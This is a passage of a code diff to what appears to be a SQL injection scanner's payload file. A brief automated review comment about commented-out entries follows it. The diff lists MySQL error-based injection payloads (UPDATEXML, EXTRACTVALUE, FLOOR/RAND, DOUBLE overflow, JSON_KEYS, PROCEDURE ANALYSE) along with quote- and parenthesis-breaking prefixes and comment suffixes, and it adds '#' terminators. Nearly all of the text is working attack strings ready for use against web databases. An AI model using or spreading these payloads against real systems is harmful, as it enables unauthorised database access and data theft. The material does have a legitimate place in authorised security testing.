{"pref": "' ", "suf": "-- wXyW"}, 635 - # {"pref": '" ', "suf": ""}, 636 - {"pref": '" ', "suf": "-- wXyW"}, 637 - # {"pref": ") ", "suf": ""}, 638 - {"pref": ") ", "suf": "-- wXyW"}, 639 - # {"pref": "') ", "suf": ""}, 640 - {"pref": "') ", "suf": "-- wXyW"}, 641 - # {"pref": '") ', "suf": ""}, 642 - {"pref": '") ', "suf": "-- wXyW"}, 643 - ], 644 - "title": "MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)", 645 - "vector": "OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT_WS(0x28,0x496e6a65637465647e,[INFERENCE],0x7e454e44)) USING utf8)))", 646 - "dbms": "MySQL", 647 - }, 648 - { 649 - "payload": "AND (SELECT(x*1E308)FROM(SELECT CONCAT_WS(0x28,0x33,0x496e6a65637465647e,0x72306f746833783439,0x7e454e44)x)y)", 650 - "comments": [ 651 - # {"pref": " ", "suf": ""}, 652 - {"pref": " ", "suf": "-- wXyW"}, 653 - # {"pref": "' ", "suf": ""}, 654 - {"pref": "' ", "suf": "-- wXyW"}, 655 - # {"pref": '" ', "suf": ""}, 656 - {"pref": '" ', "suf": "-- wXyW"}, 657 - # {"pref": ") ", "suf": ""}, 658 - {"pref": ") ", "suf": "-- wXyW"}, 659 - # {"pref": "') ", "suf": ""}, 660 - {"pref": "') ", "suf": "-- wXyW"}, 661 - # {"pref": '") ', "suf": ""}, 662 - {"pref": '") ', "suf": "-- wXyW"}, 663 - ], 664 - "title": "MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (DOUBLE)", 665 - "vector": "AND (SELECT(x*1E308)FROM(SELECT CONCAT_WS(0x28,0x33,0x496e6a65637465647e,[INFERENCE],0x7e454e44)x)y)", 666 - "dbms": "MySQL", 667 - }, 668 - { 669 - "payload": "OR (SELECT(x*1E308)FROM(SELECT CONCAT_WS(0x28,0x33,0x496e6a65637465647e,0x72306f746833783439,0x7e454e44)x)y)", 670 - "comments": [ 671 - # {"pref": " ", "suf": ""}, 672 - {"pref": " ", "suf": "-- wXyW"}, 673 - # {"pref": "' ", "suf": ""}, 674 - {"pref": "' ", "suf": "-- wXyW"}, 675 - # {"pref": '" ', "suf": ""}, 676 - {"pref": '" ', "suf": "-- wXyW"}, 677 - # {"pref": ") ", "suf": ""}, 678 - {"pref": ") ", "suf": "-- wXyW"}, 679 - # {"pref": "') ", "suf": ""}, 680 - {"pref": "') ", "suf": "-- wXyW"}, 
681 - # {"pref": '") ', "suf": ""}, 682 - {"pref": '") ', "suf": "-- wXyW"}, 683 - ], 684 - "title": "MySQL >= 5.5 OR error-based - WHERE or HAVING clause (DOUBLE)", 685 - "vector": "OR (SELECT(x*1E308)FROM(SELECT CONCAT_WS(0x28,0x33,0x496e6a65637465647e,[INFERENCE],0x7e454e44)x)y)", 686 - "dbms": "MySQL", 687 - }, 688 - { 689 - "payload": "AND UPDATEXML(0,CONCAT_WS(0x28,0x7e,0x72306f746833783439,0x7e),0)", 690 - "comments": [ 691 - # {"pref": " ", "suf": ""}, 692 - {"pref": " ", "suf": "-- wXyW"}, 693 - # {"pref": "' ", "suf": ""}, 694 - {"pref": "' ", "suf": "-- wXyW"}, 695 - # {"pref": '" ', "suf": ""}, 696 - {"pref": '" ', "suf": "-- wXyW"}, 697 - # {"pref": ") ", "suf": ""}, 698 - {"pref": ") ", "suf": "-- wXyW"}, 699 - # {"pref": "') ", "suf": ""}, 700 - {"pref": "') ", "suf": "-- wXyW"}, 701 - # {"pref": '") ', "suf": ""}, 702 - {"pref": '") ', "suf": "-- wXyW"}, 703 - ], 704 - "title": "MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)", 705 - "vector": "AND UPDATEXML(0,CONCAT_WS(0x28,0x7e,[INFERENCE],0x7e),0)", 793 + "title": "MySQL >= 5.1 AND string error-based - WHERE, HAVING , ORDER BY or GROUP BY clause (UPDATEXML )", 794 + "vector": "AND UPDATEXML(0,CONCAT_WS('(', '~',[INFERENCE],'~'),0)", 706 795 "dbms": "MySQL", 707 796 }, 708 797 { skipped 1 lines 710 799 "comments": [ 711 800 # {"pref": " ", "suf": ""}, 712 801 {"pref": " ", "suf": "-- wXyW"}, 802 + {"pref": " ", "suf": "#"}, 713 803 # {"pref": "' ", "suf": ""}, 714 804 {"pref": "' ", "suf": "-- wXyW"}, 805 + {"pref": "' ", "suf": "#"}, 715 806 # {"pref": '" ', "suf": ""}, 716 807 {"pref": '" ', "suf": "-- wXyW"}, 808 + {"pref": '" ', "suf": "#"}, 717 809 # {"pref": ") ", "suf": ""}, 718 810 {"pref": ") ", "suf": "-- wXyW"}, 811 + {"pref": ") ", "suf": "#"}, 719 812 # {"pref": "') ", "suf": ""}, 720 813 {"pref": "') ", "suf": "-- wXyW"}, 814 + {"pref": "') ", "suf": "#"}, 721 815 # {"pref": '") ', "suf": ""}, 722 816 {"pref": '") ', "suf": "-- wXyW"}, 817 + 
{"pref": '") ', "suf": "#"}, 723 818 ], 724 819 "title": "MySQL >= 5.1 OR error-based - WHERE or HAVING clause (UPDATEXML)", 725 820 "vector": "AND UPDATEXML(0,CONCAT_WS(0x28,0x7e,[INFERENCE],0x7e),0)", skipped 4 lines 730 825 "comments": [ 731 826 # {"pref": " ", "suf": ""}, 732 827 {"pref": " ", "suf": "-- wXyW"}, 828 + {"pref": " ", "suf": "#"}, 733 829 # {"pref": "' ", "suf": ""}, 734 830 {"pref": "' ", "suf": "-- wXyW"}, 831 + {"pref": "' ", "suf": "#"}, 735 832 # {"pref": '" ', "suf": ""}, 736 833 {"pref": '" ', "suf": "-- wXyW"}, 834 + {"pref": '" ', "suf": "#"}, 737 835 # {"pref": ") ", "suf": ""}, 738 836 {"pref": ") ", "suf": "-- wXyW"}, 837 + {"pref": ") ", "suf": "#"}, 739 838 # {"pref": "') ", "suf": ""}, 740 839 {"pref": "') ", "suf": "-- wXyW"}, 840 + {"pref": "') ", "suf": "#"}, 741 841 # {"pref": '") ', "suf": ""}, 742 842 {"pref": '") ', "suf": "-- wXyW"}, 843 + {"pref": '") ', "suf": "#"}, 743 844 ], 744 845 "title": "MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)", 745 846 "vector": "AND (SELECT(0)FROM(SELECT COUNT(*),CONCAT_WS(0x28,0x7e,[INFERENCE],FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)", skipped 4 lines 750 851 "comments": [ 751 852 # {"pref": " ", "suf": ""}, 752 853 {"pref": " ", "suf": "-- wXyW"}, 854 + {"pref": " ", "suf": "#"}, 753 855 # {"pref": "' ", "suf": ""}, 754 856 {"pref": "' ", "suf": "-- wXyW"}, 857 + {"pref": "' ", "suf": "#"}, 755 858 # {"pref": '" ', "suf": ""}, 756 859 {"pref": '" ', "suf": "-- wXyW"}, 860 + {"pref": '" ', "suf": "#"}, 757 861 # {"pref": ") ", "suf": ""}, 758 862 {"pref": ") ", "suf": "-- wXyW"}, 863 + {"pref": ") ", "suf": "#"}, 759 864 # {"pref": "') ", "suf": ""}, 760 865 {"pref": "') ", "suf": "-- wXyW"}, 866 + {"pref": "') ", "suf": "#"}, 761 867 # {"pref": '") ', "suf": ""}, 762 868 {"pref": '") ', "suf": "-- wXyW"}, 869 + {"pref": '") ', "suf": "#"}, 763 870 ], 764 871 "title": "MySQL >= 5.0 OR error-based - WHERE or HAVING clause (FLOOR)", 
765 872 "vector": "OR 1 GROUP BY CONCAT_WS(0x7e,[INFERENCE],FLOOR(RAND(0)*2))HAVING(MIN(0))", skipped 4 lines 770 877 "comments": [ 771 878 # {"pref": " ", "suf": ""}, 772 879 {"pref": " ", "suf": "-- wXyW"}, 880 + {"pref": " ", "suf": "#"}, 773 881 # {"pref": "' ", "suf": ""}, 774 882 {"pref": "' ", "suf": "-- wXyW"}, 883 + {"pref": "' ", "suf": "#"}, 775 884 # {"pref": '" ', "suf": ""}, 776 885 {"pref": '" ', "suf": "-- wXyW"}, 886 + {"pref": '" ', "suf": "#"}, 777 887 # {"pref": ") ", "suf": ""}, 778 888 {"pref": ") ", "suf": "-- wXyW"}, 889 + {"pref": ") ", "suf": "#"}, 779 890 # {"pref": "') ", "suf": ""}, 780 891 {"pref": "') ", "suf": "-- wXyW"}, 892 + {"pref": "') ", "suf": "#"}, 781 893 # {"pref": '") ', "suf": ""}, 782 894 {"pref": '") ', "suf": "-- wXyW"}, 895 + {"pref": '") ', "suf": "#"}, 783 896 ], 784 897 "title": "MySQL >= 5.1 error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (PROCEDURE ANALYSE)", 785 898 "vector": "PROCEDURE ANALYSE(UPDATEXML(0,CONCAT_WS(0x28,0x7e,[INFERENCE],0x7e),0),1)", skipped 4 lines 790 903 "comments": [ 791 904 # {"pref": " ", "suf": ""}, 792 905 {"pref": " ", "suf": "-- wXyW"}, 906 + {"pref": " ", "suf": "#"}, 793 907 # {"pref": "' ", "suf": ""}, 794 908 {"pref": "' ", "suf": "-- wXyW"}, 909 + {"pref": "' ", "suf": "#"}, 795 910 # {"pref": '" ', "suf": ""}, 796 911 {"pref": '" ', "suf": "-- wXyW"}, 912 + {"pref": '" ', "suf": "#"}, 797 913 # {"pref": ") ", "suf": ""}, 798 914 {"pref": ") ", "suf": "-- wXyW"}, 915 + {"pref": ") ", "suf": "#"}, 799 916 # {"pref": "') ", "suf": ""}, 800 917 {"pref": "') ", "suf": "-- wXyW"}, 918 + {"pref": "') ", "suf": "#"}, 801 919 # {"pref": '") ', "suf": ""}, 802 920 {"pref": '") ', "suf": "-- wXyW"}, 921 + {"pref": '") ', "suf": "#"}, 803 922 ], 804 923 "title": "MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)", 805 924 "vector": "AND EXTRACTVALUE(0,CONCAT_WS(0x28,0x7e,[INFERENCE],0x7e))", skipped 4 lines 810 929 "comments": [ 811 930 # 
{"pref": " ", "suf": ""}, 812 931 {"pref": " ", "suf": "-- wXyW"}, 932 + {"pref": " ", "suf": "#"}, 813 933 # {"pref": "' ", "suf": ""}, 814 934 {"pref": "' ", "suf": "-- wXyW"}, 935 + {"pref": "' ", "suf": "#"}, 815 936 # {"pref": '" ', "suf": ""}, 816 937 {"pref": '" ', "suf": "-- wXyW"}, 938 + {"pref": '" ', "suf": "#"}, 817 939 # {"pref": ") ", "suf": ""}, 818 940 {"pref": ") ", "suf": "-- wXyW"}, 941 + {"pref": ") ", "suf": "#"}, 819 942 # {"pref": "') ", "suf": ""}, 820 943 {"pref": "') ", "suf": "-- wXyW"}, 944 + {"pref": "') ", "suf": "#"}, 821 945 # {"pref": '") ', "suf": ""}, 822 946 {"pref": '") ', "suf": "-- wXyW"}, 947 + {"pref": '") ', "suf": "#"}, 823 948 ], 824 949 "title": "MySQL >= 5.1 OR error-based - WHERE or HAVING clause (EXTRACTVALUE)", 825 950 "vector": "AND EXTRACTVALUE(0,CONCAT_WS(0x28,0x7e,[INFERENCE],0x7e))", skipped 959 lines
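Review bot: The ten `error-based` entries added at new lines 485–744 arrive fully commented out, and the second `comments` list also gains entries that are commented out on arrival (new lines 258 and 263–266), so the commit adds roughly 260 lines of dead data whose status a reader cannot tell from the file. These entries were live before this change, so delete them and let version control hold the history, or leave one explanatory line in their place such as `# BIGINT UNSIGNED / EXP / GTID_SUBSET / JSON_KEYS / DOUBLE entries disabled: <reason>`. The nested `# # {"pref": ...}` markers inside the commented blocks make it easy to restore an entry later with a different set of active boundaries than it had before. The enclosing lists open before and continue past the visible lines, so this note rests only on what the page shows.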